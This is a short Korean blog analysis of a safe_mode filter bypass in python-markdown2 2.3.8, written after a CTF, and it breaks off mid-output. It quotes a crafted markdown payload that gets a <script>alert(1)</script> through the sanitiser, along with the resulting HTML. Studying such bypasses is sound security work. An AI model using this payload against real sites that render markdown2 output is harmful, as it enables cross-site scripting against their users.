[python-markdown2] safe_mode Filter bypass 분석글
![이미지](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMVMMOjc1tDQUfFdOn7_0TPSnoBap_rQHaOV4HZ85rLirdI-dM_HPE0kMoLab_mN4hDOSVnMPALLwZ-VcVS2lmp7ni0jjFk2SbdQB-tBBLEQgIRPkeB5yRj5isSyq8KV_pNE8RmhNxVyI/s640/%25E1%2584%2589%25E1%2585%25B3%25E1%2584%258F%25E1%2585%25B3%25E1%2584%2585%25E1%2585%25B5%25E1%2586%25AB%25E1%2584%2589%25E1%2585%25A3%25E1%2586%25BA+2020-04-12+%25E1%2584%258B%25E1%2585%25A9%25E1%2584%2592%25E1%2585%25AE+6.06.49.png)
개요 * 작성일 기준 version: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf ) CTF하다가 markdown2 모듈을 사용하길래 해당 모듈 찾아보다가 아래 이슈를 발견하였다. https://github.com/trentm/python-markdown2/issues/341 Filter Bypass ????!! - Expected Result ```python >>> import markdown2 >>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True) '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n' ``` - Issue Payload ```python >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True) '<p><http://g<!s://q?<!-<<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-<<a href=&